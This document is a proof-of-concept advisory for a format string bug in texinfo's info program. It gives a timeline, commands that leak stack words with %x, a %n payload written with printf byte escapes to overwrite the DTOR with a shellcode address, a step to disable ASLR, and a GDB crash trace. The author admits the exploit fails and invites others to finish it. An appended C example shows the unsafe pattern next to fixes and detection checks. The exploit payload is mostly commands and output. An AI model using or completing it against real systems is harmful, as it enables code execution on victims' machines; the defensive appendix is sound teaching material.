--==+=============================================+==--
--==+ texinfo <= 4.9 format string vuln PoC +==--
--==+=============================================+==--

DISCOVERED BY: Cody Rester
WEBSITE: www.codyrester.com

--==+=============================================+==--
TIMELINE:
--==+=============================================+==--

11-04-2007 - Discovered bug by fuzzing the input on texinfo 4.8
11-05-2007 - Installed via source version 4.9, bug still there
11-06-2007 - Working on Ubuntu 7.10, stack seems randomized, the offset and shellcode keep changing locations
11-07-2007 - Found out how to turn off randomization: kernel.randomize_va_space = 0
11-08-2007 - Got the correct offsets and values, but keep getting segfaults. Not sure what to do at this point.

DETAILS:
--==+=============================================+==--

address@hidden:~$ /usr/local/bin/info --file="%x %x %x %x %x %x %x %x %x %x"
info: 0 0 8071870 2 0 0 bffff744 0 bffff6a8 805092e: No such file or directory
address@hidden:~$
address@hidden:~$ /usr/local/bin/info --file=BBBAAAAAB%153\$x
info: BBBAAAAAB41414141: No such file or directory
address@hidden:~$

--==+=============================================+==--
SHELLCODE: 0xbffff9c7
DTOR:      0x08068330
OFFSET:    153
--==+=============================================+==--

address@hidden:~$ /usr/local/bin/info --file=AAA`printf "\x30\x83\x06\x08\x31\x83\x06\x08\x32\x83\x06\x08\x33\x83\x06\x08"`%156\$43x%156\$n%156\$50x%157\$n%156\$262x%158\$n%156\$192x%159\$nA
info: AAA0�1�2�3� 8068330 8068330 8068330 8068330A: No such file or directory
Segmentation fault (core dumped)
address@hidden:~$

--==+=============================================+==--
Examining the stack with GDB
--==+=============================================+==--

(gdb) run --file=`printf "\x30\x83\x06\x08\x31\x83\x06\x08\x32\x83\x06\x08\x33\x83\x06\x08"`%154\$45x%154\$n%154\$50x%155\$n%154\$262x%156\$n%154\$192x%157\$n...
Starting program: /usr/local/bin/info --file=`printf "\x30\x83\x06\x08\x31\x83\x06\x08\x32\x83\x06\x08\x33\x83\x06\x08"`%154\$45x%154\$n%154\$50x%155\$n%154\$262x%156\$n%154\$192x%157\$n...
info: 0�1�2�3� 8068330 8068330 8068330 8068330...: No such file or directory

Program received signal SIGSEGV, Segmentation fault.
0x35756f3d in ?? ()
(gdb) bt
#0  0x35756f3d in ?? ()
#1  0x080499ab in __do_global_dtors_aux ()
#2  0x08062c20 in _fini ()
#3  0xb7ff3a1f in ?? () from /lib/ld-linux.so.2
#4  0xb8001260 in _rtld_global () from /lib/ld-linux.so.2
#5  0x00000000 in ?? ()
(gdb) info reg
eax            0x8068334    134644532
ecx            0xbffff530   -1073744592
edx            0x35756f3d   896888637
ebx            0x8068414    134644756
esp            0xbffff4fc   0xbffff4fc
ebp            0xbffff508   0xbffff508
esi            0xb8001668   -1207953816
edi            0x0          0
eip            0x35756f3d   0x35756f3d
eflags         0x210202     [ IF RF ID ]
cs             0x73         115
ss             0x7b         123
ds             0x7b         123
es             0x7b         123
fs             0x0          0
gs             0x33         51
(gdb)

--==+=============================================+==--
CONCLUSION
--==+=============================================+==--

All offsets and values have been calculated correctly, but texinfo refuses to execute the shellcode address given. It doesn't look like it's overwriting the DTOR correctly, and the EIP is 0x35756f3d, which is not what I want. So, well, I just wanna get rid of it off my mind for now, I lost 8 hours of sleep last night working on this, only to have it time and time again fail. It's almost there, but I'm not sure how to get it working. Thus, the Proof-of-Concept title. Hopefully someone can take this and get an exploit working. Peace f00s.
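The bug class behind this PoC, untrusted text reaching a printf-family routine as the format itself, shown as an added C example that is not part of the advisory or of texinfo's own code (function names are hypothetical). It puts the unsafe shape beside the literal-format fix and two defence-in-depth checks a maintainer could add so that the "%x" leak and "%n" write seen in the traces above cannot happen.

```c
/* Added example (not from the advisory): the unsafe pattern beside
 * defensive fixes. All names are hypothetical. */
#include <stdio.h>
#include <string.h>
#include <stdbool.h>
#include <stdlib.h>

/* UNSAFE shape: a caller-supplied filename becomes the format string.
 * "%x" then reads stack words and "%n" writes a byte count through a
 * stack pointer, which is what the advisory's --file=... runs show.
 * Never call this with user input; it is here only to show the defect. */
int report_unsafe(char *out, size_t n, const char *filename) {
    return snprintf(out, n, filename);
}

/* Fix 1: the format is a literal; the filename is only ever data. */
int report_safe(char *out, size_t n, const char *filename) {
    return snprintf(out, n, "info: %s: No such file or directory", filename);
}

/* Fix 2 (triage / defence in depth): detect conversion directives in
 * untrusted text before it reaches legacy code that may still use it as
 * a format. A '%' not followed by another '%' starts a directive. */
bool has_format_directive(const char *s) {
    for (const char *p = s; (p = strchr(p, '%')) != NULL; p++) {
        if (p[1] == '%') { p++; continue; }   /* "%%" is a literal percent */
        return true;
    }
    return false;
}

/* Fix 3: neutralise by doubling every '%' so the text survives being
 * passed to an API that insists on treating it as a format.
 * The caller frees the returned buffer. */
char *escape_percent(const char *s) {
    size_t extra = 0;
    for (const char *p = s; *p; p++) if (*p == '%') extra++;
    char *r = malloc(strlen(s) + extra + 1), *q = r;
    if (!r) return NULL;
    for (const char *p = s; *p; p++) { *q++ = *p; if (*p == '%') *q++ = '%'; }
    *q = '\0';
    return r;
}
```

Building with `-Wformat-security` flags report_unsafe at compile time, which is the cheapest way to find this class of bug in a code base.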